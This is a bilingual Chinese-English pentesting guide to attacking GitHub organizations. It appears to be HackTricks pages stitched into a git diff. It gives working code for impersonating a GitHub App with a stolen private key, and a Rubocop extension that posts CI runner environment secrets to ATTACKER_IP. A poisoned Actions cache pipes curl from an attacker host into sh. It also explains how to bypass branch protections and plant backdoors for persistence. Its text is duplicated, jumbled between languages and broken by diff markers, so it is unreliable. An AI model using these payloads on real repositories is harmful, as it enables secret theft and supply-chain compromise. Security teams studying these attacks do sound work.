> [!WARNING]
> 当你在一个仓库中查找泄露并运行类似 `git log -p` 的命令时,不要忘记可能存在**其他分支和其他提交**包含秘密!
> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
### 外部分支
### External Forks
可以通过滥用拉取请求来**妥协仓库**。要知道一个仓库是否脆弱,你主要需要查看 Github Actions yaml 配置。 [**更多信息见下文**](#execution-from-a-external-fork)
It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](#execution-from-a-external-fork).
### 删除/内部分支中的 Github 泄露
### Github Leaks in deleted/internal forks
即使是删除或内部的,也可能从 github 仓库的分支中获取敏感数据。请在此查看:
Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
{{#ref}}
accessible-deleted-data-in-github.md
{{#endref}}
## 组织强化
## Organization Hardening
### 成员权限
### Member Privileges
可以分配一些**默认权限**给组织的**成员**。这些可以从页面 `https://github.com/organizations/<org_name>/settings/member_privileges` 或从 [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs) 控制。
There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
- **基本权限**:成员将对组织仓库拥有 None/Read/write/Admin 权限。推荐设置为**None**或**Read**。
- **仓库分叉**:如果不必要,最好**不允许**成员分叉组织仓库。
- **页面创建**:如果不必要,最好**不允许**成员从组织仓库发布页面。如果必要,可以允许创建公共或私有页面。
- **集成访问请求**:启用此功能后,外部协作者将能够请求访问 GitHub OAuth 应用程序以访问该组织及其资源。通常是需要的,但如果不需要,最好禁用它。
- _我在 API 响应中找不到此信息,如果你找到了,请分享_
- **仓库可见性更改**:如果启用,具有**管理员**权限的**成员**将能够**更改其可见性**。如果禁用,只有组织所有者可以更改仓库的可见性。如果你**不**希望人们将内容**公开**,请确保此选项**禁用**。
- _我在 API 响应中找不到此信息,如果你找到了,请分享_
- **仓库删除和转移**:如果启用,具有**管理员**权限的成员将能够**删除**或**转移**公共和私有**仓库**
- _我在 API 响应中找不到此信息,如果你找到了,请分享_
- **允许成员创建团队**:如果启用,任何组织的**成员**将能够**创建**新**团队**。如果禁用,只有组织所有者可以创建新团队。最好将此选项禁用。
- _我在 API 响应中找不到此信息,如果你找到了,请分享_
- **更多设置可以在此页面配置**,但前面的设置是与安全性相关的。
- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
- _I couldn't find this info in the APIs response, share if you do_
- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
- _I couldn't find this info in the APIs response, share if you do_
- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
- _I couldn't find this info in the APIs response, share if you do_
- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
- _I couldn't find this info in the APIs response, share if you do_
- **More things can be configured** in this page but the previous are the ones more security related.
### Actions 设置
### Actions Settings
可以从页面 `https://github.com/organizations/<org_name>/settings/actions` 配置多个与安全相关的设置。
Several security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.
> [!NOTE]
> 请注意,所有这些配置也可以在每个仓库中独立设置
> Note that all this configurations can also be set on each repository independently
- **Github actions 策略**:允许你指明哪些仓库可以运行工作流,哪些工作流应该被允许。建议**指定哪些仓库**应该被允许,而不是允许所有操作运行。
- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
- **来自外部协作者的拉取请求工作流**:建议**要求所有**外部协作者的批准。
- _我找不到包含此信息的 API如果你找到了请分享_
- **从拉取请求运行工作流**:强烈**不建议从拉取请求运行工作流**,因为分支来源的维护者将获得使用具有读取权限的源仓库令牌的能力。
- _我找不到包含此信息的 API如果你找到了请分享_
- **工作流权限**:强烈建议**仅授予读取仓库权限**。不建议授予写入和创建/批准拉取请求的权限,以避免滥用提供给运行工作流的 GITHUB_TOKEN。
- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
- _I couldn't find an API with this info, share if you do_
- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
- _I couldn't find an API with this info, share if you do_
- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
### 集成
### Integrations
_如果你知道访问此信息的 API 端点,请告诉我!_
_Let me know if you know the API endpoint to access this info!_
- **第三方应用程序访问策略**:建议限制对每个应用程序的访问,仅允许必要的应用程序(在审核后)。
- **已安装的 GitHub 应用程序**:建议仅允许必要的应用程序(在审核后)。
- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
## 侦查与滥用凭证的攻击
## Recon & Attacks abusing credentials
在此场景中,我们假设你已经获得了对一个 github 账户的某些访问权限。
For this scenario we are going to suppose that you have obtained some access to a github account.
### 使用用户凭证
### With User Credentials
如果你以某种方式已经获得了组织内某个用户的凭证,你可以**直接登录**并检查你拥有的**企业和组织角色**,如果你是普通成员,检查普通成员拥有的**权限**、你所在的**组**、你对哪些**仓库**拥有的**权限**,以及**这些仓库是如何保护的**
If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
请注意,**可能会使用 2FA**,因此你只能在能够**通过该检查**的情况下访问此信息。
Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
> [!NOTE]
> 请注意,如果你**设法窃取了 `user_session` cookie**(当前配置为 SameSite: Lax你可以**完全冒充该用户**,而无需凭证或 2FA
> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
查看下面关于 [**分支保护绕过**](#branch-protection-bypass) 的部分,以防有用。
Check the section below about [**branch protections bypasses**](#branch-protection-bypass) in case it's useful.
### 使用用户 SSH 密钥
### With User SSH Key
Github 允许**用户**设置**SSH 密钥**,作为**代表他们部署代码的身份验证方法**(不应用 2FA
Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
使用此密钥,你可以对用户拥有某些权限的仓库进行**更改**,但是你不能使用它访问 github api 来枚举环境。然而,你可以获取**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
如果用户将其用户名配置为他的 github 用户名,您可以访问他账户中设置的 **公钥**,网址为 _https://github.com/\<github_username>.keys_您可以检查此以确认您找到的私钥是否可以使用。
**SSH 密钥** 也可以在仓库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从仓库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。
If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\<github_username>.keys_, you could check this to confirm the private key you found can be used.
#### GPG 密钥
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。
#### GPG Keys
As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
Check locally if the current user has any key with:
在本地检查当前用户是否有任何密钥:
```shell
gpg --list-secret-keys --keyid-format=long
```
### 使用用户令牌
有关[**用户令牌的基本信息**](basic-github-information.md#personal-access-tokens)的介绍。
### With User Token
用户令牌可以**替代密码**用于通过 HTTPS 进行 Git 操作,或可用于[**通过基本身份验证对 API 进行身份验证**](https://docs.github.com/v3/auth/#basic-authentication)。根据附加的权限,您可能能够执行不同的操作。
For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
用户令牌的格式如下:`ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
### 使用 Oauth 应用程序
A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
有关[**Github Oauth 应用程序的基本信息**](basic-github-information.md#oauth-applications)的介绍。
### With Oauth Application
攻击者可能会创建一个**恶意 Oauth 应用程序**,以访问接受它们的用户的特权数据/操作,这可能是网络钓鱼活动的一部分。
For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
这是[Oauth 应用程序可以请求的范围](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)。在接受之前,应该始终检查请求的范围。
An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问权限**。
These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
### 使用 Github 应用程序
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
有关[**Github 应用程序的基本信息**](basic-github-information.md#github-applications)的介绍。
### With Github Application
攻击者可能会创建一个**恶意 Github 应用程序**,以访问接受它们的用户的特权数据/操作,这可能是网络钓鱼活动的一部分。
For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问权限**。
An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
#### 使用其私钥JWT → 安装访问令牌)冒充 GitHub 应用程序
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
如果您获得了 GitHub 应用程序的私钥PEM您可以在其所有安装中完全冒充该应用程序
#### Impersonate a GitHub App with its private key (JWT → installation access tokens)
- 生成一个使用私钥签名的短期 JWT
- 调用 GitHub 应用程序 REST API 列举安装
- 铸造每个安装的访问令牌,并使用它们列出/克隆/推送到授予该安装的仓库
If you obtain the private key (PEM) of a GitHub App, you can fully impersonate the app across all of its installations:
要求:
- GitHub 应用程序私钥PEM
- GitHub 应用程序 ID数字。GitHub 要求 iss 为应用程序 ID
- Generate a shortlived JWT signed with the private key
- Call the GitHub App REST API to enumerate installations
- Mint perinstallation access tokens and use them to list/clone/push to repositories granted to that installation
Requirements:
- GitHub App private key (PEM)
- GitHub App ID (numeric). GitHub requires iss to be the App ID
Create JWT (RS256):
创建 JWTRS256
```python
#!/usr/bin/env python3
import time, jwt
with open("priv.pem", "r") as f:
signing_key = f.read()
signing_key = f.read()
APP_ID = "123456" # GitHub App ID (numeric)
def gen_jwt():
now = int(time.time())
payload = {
"iat": now - 60,
"exp": now + 600 - 60, # ≤10 minutes
"iss": APP_ID,
}
return jwt.encode(payload, signing_key, algorithm="RS256")
now = int(time.time())
payload = {
"iat": now - 60,
"exp": now + 600 - 60, # ≤10 minutes
"iss": APP_ID,
}
return jwt.encode(payload, signing_key, algorithm="RS256")
```
列出经过身份验证的应用程序的安装:
List installations for the authenticated app:
```bash
JWT=$(python3 -c 'import time,jwt,sys;print(jwt.encode({"iat":int(time.time()-60),"exp":int(time.time())+540,"iss":sys.argv[1]}, open("priv.pem").read(), algorithm="RS256"))' 123456)
curl -sS -H "Authorization: Bearer $JWT" \
-H "Accept: application/vnd.github+json" \
-H "X-GitHub-Api-Version: 2022-11-28" \
https://api.github.com/app/installations
-H "Accept: application/vnd.github+json" \
-H "X-GitHub-Api-Version: 2022-11-28" \
https://api.github.com/app/installations
```
创建一个安装访问令牌有效期≤10分钟
Create an installation access token (valid ≤ 10 minutes):
```bash
INSTALL_ID=12345678
curl -sS -X POST \
-H "Authorization: Bearer $JWT" \
-H "Accept: application/vnd.github+json" \
-H "X-GitHub-Api-Version: 2022-11-28" \
https://api.github.com/app/installations/$INSTALL_ID/access_tokens
-H "Authorization: Bearer $JWT" \
-H "Accept: application/vnd.github+json" \
-H "X-GitHub-Api-Version: 2022-11-28" \
https://api.github.com/app/installations/$INSTALL_ID/access_tokens
```
使用令牌访问代码。您可以使用 xaccesstoken URL 形式进行克隆或推送:
Use the token to access code. You can clone or push using the xaccesstoken URL form:
```bash
TOKEN=ghs_...
REPO=owner/name
git clone https://x-access-token:${TOKEN}@github.com/${REPO}.git
git clone https://x-access-token:${TOKEN}@github.com/${REPO}.git
# push works if the app has contents:write on that repository
```
程序化的 PoC 以针对特定组织并列出私有仓库 (PyGithub + PyJWT):
Programmatic PoC to target a specific org and list private repos (PyGithub + PyJWT):
```python
#!/usr/bin/env python3
import time, jwt, requests
from github import Auth, GithubIntegration
with open("priv.pem", "r") as f:
signing_key = f.read()
signing_key = f.read()
APP_ID = "123456" # GitHub App ID (numeric)
ORG = "someorg"
def gen_jwt():
now = int(time.time())
payload = {"iat": now-60, "exp": now+540, "iss": APP_ID}
return jwt.encode(payload, signing_key, algorithm="RS256")
now = int(time.time())
payload = {"iat": now-60, "exp": now+540, "iss": APP_ID}
return jwt.encode(payload, signing_key, algorithm="RS256")
auth = Auth.AppAuth(APP_ID, signing_key)
GI = GithubIntegration(auth=auth)
@@ -240,53 +253,57 @@ print(f"Installation ID: {installation.id}")
jwt_tok = gen_jwt()
r = requests.post(
f"https://api.github.com/app/installations/{installation.id}/access_tokens",
headers={
"Accept": "application/vnd.github+json",
"Authorization": f"Bearer {jwt_tok}",
"X-GitHub-Api-Version": "2022-11-28",
},
f"https://api.github.com/app/installations/{installation.id}/access_tokens",
headers={
"Accept": "application/vnd.github+json",
"Authorization": f"Bearer {jwt_tok}",
"X-GitHub-Api-Version": "2022-11-28",
},
)
access_token = r.json()["token"]
print("--- repos ---")
for repo in installation.get_repos():
print(f"* {repo.full_name} (private={repo.private})")
clone_url = f"https://x-access-token:{access_token}@github.com/{repo.full_name}.git"
print(clone_url)
print(f"* {repo.full_name} (private={repo.private})")
clone_url = f"https://x-access-token:{access_token}@github.com/{repo.full_name}.git"
print(clone_url)
```
注意:
- 安装令牌完全继承应用程序的仓库级权限例如contents: write, pull_requests: write
- 令牌在≤10分钟内过期但只要保留私钥可以无限期生成新令牌
- 您还可以通过REST APIGET /app/installations使用JWT枚举安装
## 破坏与滥用Github Action
Notes:
- Installation tokens inherit exactly the apps repositorylevel permissions (for example, contents: write, pull_requests: write)
- Tokens expire in ≤10 minutes, but new tokens can be minted indefinitely as long as you retain the private key
- You can also enumerate installations via the REST API (GET /app/installations) using the JWT
有几种技术可以破坏和滥用Github Action,查看它们:
## Compromise & Abuse Github Action
There are several techniques to compromise and abuse a Github Action, check them here:
{{#ref}}
abusing-github-actions/
{{#endref}}
## 滥用运行外部工具的第三方GitHub应用程序Rubocop扩展RCE
## Abusing thirdparty GitHub Apps running external tools (Rubocop extension RCE)
一些GitHub应用程序和PR审查服务使用仓库控制的配置文件对拉取请求执行外部代码检查/SAST。如果支持的工具允许动态代码加载PR可以在服务的运行器上实现RCE。
Some GitHub Apps and PR review services execute external linters/SAST against pull requests using repositorycontrolled configuration files. If a supported tool allows dynamic code loading, a PR can achieve RCE on the services runner.
示例Rubocop支持从其YAML配置加载扩展。如果服务通过提供的.reporubocop.yml您可以通过要求本地文件执行任意Ruby代码。
Example: Rubocop supports loading extensions from its YAML config. If the service passes through a repoprovided .rubocop.yml, you can execute arbitrary Ruby by requiring a local file.
- 触发条件通常包括:
- 工具在服务中已启用
- PR包含工具识别的文件对于Rubocop.rb
- 仓库包含工具的配置文件Rubocop在任何地方搜索.rubocop.yml
- Trigger conditions usually include:
- The tool is enabled in the service
- The PR contains files the tool recognizes (for Rubocop: .rb)
- The repo contains the tools config file (Rubocop searches for .rubocop.yml anywhere)
在PR中的利用文件
Exploit files in the PR:
.rubocop.yml
```yaml
require:
- ./ext.rb
- ./ext.rb
```
ext.rb (提取运行环境变量):
ext.rb (exfiltrate runner env vars):
```ruby
require 'net/http'
require 'uri'
@@ -297,92 +314,99 @@ json_data = env_vars.to_json
url = URI.parse('http://ATTACKER_IP/')
begin
http = Net::HTTP.new(url.host, url.port)
req = Net::HTTP::Post.new(url.path)
req['Content-Type'] = 'application/json'
req.body = json_data
http.request(req)
http = Net::HTTP.new(url.host, url.port)
req = Net::HTTP::Post.new(url.path)
req['Content-Type'] = 'application/json'
req.body = json_data
http.request(req)
rescue StandardError => e
warn e.message
warn e.message
end
```
也包括一个足够大的虚拟 Ruby 文件例如main.rb以便 linter 实际运行。
在实际中观察到的影响:
- 在执行 linter 的生产运行器上完全执行代码
- 外泄敏感环境变量,包括服务使用的 GitHub App 私钥、API 密钥、数据库凭证等。
- 使用泄露的 GitHub App 私钥,您可以生成安装令牌并获得对该应用程序授予的所有存储库的读/写访问权限(请参见上面关于 GitHub App 冒充的部分)
Also include a sufficiently large dummy Ruby file (e.g., main.rb) so the linter actually runs.
运行外部工具的服务的加固指南:
- 将存储库提供的工具配置视为不受信任的代码
- 在严格隔离的沙箱中执行工具,不挂载敏感环境变量
- 应用最小权限凭证和文件系统隔离,并限制/拒绝不需要互联网访问的工具的出站网络流量
Impact observed in the wild:
- Full code execution on the production runner that executed the linter
- Exfiltration of sensitive environment variables, including the GitHub App private key used by the service, API keys, DB credentials, etc.
- With a leaked GitHub App private key you can mint installation tokens and get read/write access to all repositories granted to that app (see the section above on GitHub App impersonation)
## 分支保护绕过
Hardening guidelines for services running external tools:
- Treat repositoryprovided tool configs as untrusted code
- Execute tools in tightly isolated sandboxes with no sensitive environment variables mounted
- Apply leastprivilege credentials and filesystem isolation, and restrict/deny outbound network egress for tools that dont require internet access
- **要求一定数量的批准**:如果您妥协了多个帐户,您可能只需接受其他帐户的 PR。如果您只有创建 PR 的帐户,则无法接受自己的 PR。但是如果您可以访问存储库中的 **Github Action** 环境,使用 **GITHUB_TOKEN**,您可能能够 **批准您的 PR** 并以这种方式获得 1 次批准。
- _注意对于此以及代码所有者限制通常用户无法批准自己的 PR但如果您可以您可以利用它来接受自己的 PR。_
- **在推送新提交时撤销批准**:如果未设置此项,您可以提交合法代码,等待某人批准,然后放入恶意代码并将其合并到受保护的分支中。
- **要求代码所有者的审查**:如果启用此项且您是代码所有者,您可以让 **Github Action 创建您的 PR然后自己批准它**
-**CODEOWNER 文件配置错误**GitHub 不会抱怨,但它不会使用它。因此,如果配置错误,**代码所有者保护将不适用。**
- **允许指定的参与者绕过拉取请求要求**:如果您是这些参与者之一,您可以绕过拉取请求保护。
- **包括管理员**:如果未设置此项且您是存储库的管理员,您可以绕过此分支保护。
- **PR 劫持**:您可能能够 **修改其他人的 PR**,添加恶意代码,自己批准结果 PR 并合并所有内容。
- **移除分支保护**:如果您是 **存储库的管理员,您可以禁用保护**,合并您的 PR 并重新设置保护。
- **绕过推送保护**:如果存储库 **仅允许某些用户** 在分支中发送推送(合并代码)(分支保护可能保护所有分支,指定通配符 `*`)。
- 如果您对存储库 **具有写入访问权限,但由于分支保护不允许推送代码**,您仍然可以 **创建一个新分支**,并在其中创建一个 **在代码推送时触发的 github action**。由于 **分支保护在创建之前不会保护该分支**,因此对该分支的第一次代码推送将 **执行 github action**
## Branch Protection Bypass
## 绕过环境保护
- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
- _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
- **Dismiss approvals when new commits are pushed**: If this isnt set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
- When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
- **Include administrators**: If this isnt set and you are admin of the repo, you can bypass this branch protections.
- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
- If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
有关 [**Github 环境的介绍,请查看基本信息**](basic-github-information.md#git-environments)。
## Bypass Environments Protections
如果一个环境可以 **从所有分支访问**,则它 **没有保护**,您可以轻松访问环境中的秘密。请注意,您可能会发现某些存储库 **所有分支都受到保护**(通过指定其名称或使用 `*`),在这种情况下,**找到一个可以推送代码的分支**,您可以 **通过创建新的 github action或修改一个来外泄** 秘密。
For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
请注意,您可能会发现边缘情况,其中 **所有分支都受到保护**(通过通配符 `*`),并指定 **谁可以向分支推送代码**_您可以在分支保护中指定_并且 **您的用户不被允许**。您仍然可以运行自定义 github action因为您可以创建一个分支并在其上使用推送触发器。**分支保护允许推送到新分支,因此 github action 将被触发**。
```yaml
push: # Run it when a push is made to a branch
branches:
- current_branch_name #Use '**' to run when a push is made to any branch
branches:
- current_branch_name #Use '**' to run when a push is made to any branch
```
注意,**在创建**分支后,**分支保护将适用于新分支**,您将无法修改它,但在那时您已经提取了秘密。
## 持久性
Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
- 生成**用户令牌**
- 从**秘密**中窃取**github令牌**
- **删除**工作流**结果**和**分支**
- 给**所有组织**更多权限
- 创建**webhooks**以提取信息
- 邀请**外部协作者**
- **移除****SIEM**使用的**webhooks**
- 创建/修改带有**后门**的**Github Action**
- 通过**秘密**值修改查找**易受攻击的Github Action以进行命令注入**
## Persistence
### 冒名顶替提交 - 通过repo提交的后门
- Generate **user token**
- Steal **github tokens** from **secrets**
- **Deletion** of workflow **results** and **branches**
- Give **more permissions to all the org**
- Create **webhooks** to exfiltrate information
- Invite **outside collaborators**
- **Remove** **webhooks** used by the **SIEM**
- Create/modify **Github Action** with a **backdoor**
- Find **vulnerable Github Action to command injection** via **secret** value modification
在Github中可以**从一个fork创建一个PR到一个repo**。即使PR**未被接受**在原始repo中也会为代码的fork版本创建一个**提交**id。因此攻击者**可以固定使用一个来自看似合法的repo的特定提交该提交并不是由repo的所有者创建的**。
### Imposter Commits - Backdoor via repo commits
In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
像[**这个**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e)
```yaml
name: example
on: [push]
jobs:
commit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- shell: bash
run: |
echo 'hello world!'
commit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- shell: bash
run: |
echo 'hello world!'
```
有关更多信息,请查看 [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
## 参考文献
For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
- [我们如何利用 CodeRabbit从一个简单的 PR 到 RCE 和对 100 万个代码库的写入访问](https://research.kudelskisecurity.com/2025/08/19/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories/)
- [Rubocop 扩展(需要)](https://docs.rubocop.org/rubocop/latest/extensions.html)
- [使用 GitHub 应用进行身份验证JWT](https://docs.github.com/en/apps/creating-github-apps/authenticating-with-a-github-app)
- [列出已验证应用的安装](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#list-installations-for-the-authenticated-app)
- [为应用创建安装访问令牌](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#create-an-installation-access-token-for-an-app)
## References
- [How we exploited CodeRabbit: from a simple PR to RCE and write access on 1M repositories](https://research.kudelskisecurity.com/2025/08/19/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories/)
- [Rubocop extensions (require)](https://docs.rubocop.org/rubocop/latest/extensions.html)
- [Authenticating with a GitHub App (JWT)](https://docs.github.com/en/apps/creating-github-apps/authenticating-with-a-github-app)
- [List installations for the authenticated app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#list-installations-for-the-authenticated-app)
- [Create an installation access token for an app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#create-an-installation-access-token-for-an-app)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,3 +1,5 @@
# Gh Actions - Artifact Poisoning
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -2,49 +2,4 @@
{{#include ../../../banners/hacktricks-training.md}}
## 概述
GitHub Actions cache 在仓库范围内是全局的。任何知道 cache `key`(或 `restore-keys`)的 workflow 都可以填充该条目,即使该 job 只有 `permissions: contents: read` 权限。GitHub 不会按照 workflow、事件类型或信任等级隔离 caches因此攻击者如果攻破一个低权限的 job就可以 poison 一个随后会被有特权的 release job restore 的 cache。这就是 Ultralytics 的入侵如何从 `pull_request_target` workflow 转向 PyPI 发布流水线的方式。
## 攻击原语
- `actions/cache` 暴露了恢复和保存两种操作(`actions/cache@v4``actions/cache/save@v4``actions/cache/restore@v4`)。除非是来自 forks 的真正不受信任的 `pull_request` workflows否则任意 job 都被允许调用 save。
- Cache 条目仅由 `key` 标识。宽泛的 `restore-keys` 会让注入 payload 变得容易,因为攻击者只需与某个前缀发生碰撞。
- 缓存的文件系统会原样恢复。如果 cache 包含随后会被执行的脚本或二进制文件,攻击者就能控制这条执行路径。
## 示例利用链
_Author workflow (`pull_request_target`) poisoned the cache:_
```yaml
steps:
- run: |
mkdir -p toolchain/bin
printf '#!/bin/sh\ncurl https://attacker/payload.sh | sh\n' > toolchain/bin/build
chmod +x toolchain/bin/build
- uses: actions/cache/save@v4
with:
path: toolchain
key: linux-build-${{ hashFiles('toolchain.lock') }}
```
_Privileged workflow 恢复并执行了 poisoned cache:_
```yaml
steps:
- uses: actions/cache/restore@v4
with:
path: toolchain
key: linux-build-${{ hashFiles('toolchain.lock') }}
- run: toolchain/bin/build release.tar.gz
```
第二个作业现在在持有发布凭证PyPI tokens、PATs、cloud deploy keys 等)的情况下运行攻击者控制的代码。
## 实用利用提示
- 针对由 `pull_request_target``issue_comment` 或仍会保存缓存的 bot 命令触发的 workflowGitHub 允许它们覆盖整个仓库范围的密钥,即使 runner 对仓库只有只读访问权限。
- 查找在信任边界间重用的确定性 cache keys例如`pip-${{ hashFiles('poetry.lock') }}`)或宽松的 `restore-keys`,然后在有特权的 workflow 运行前保存你的恶意 tarball。
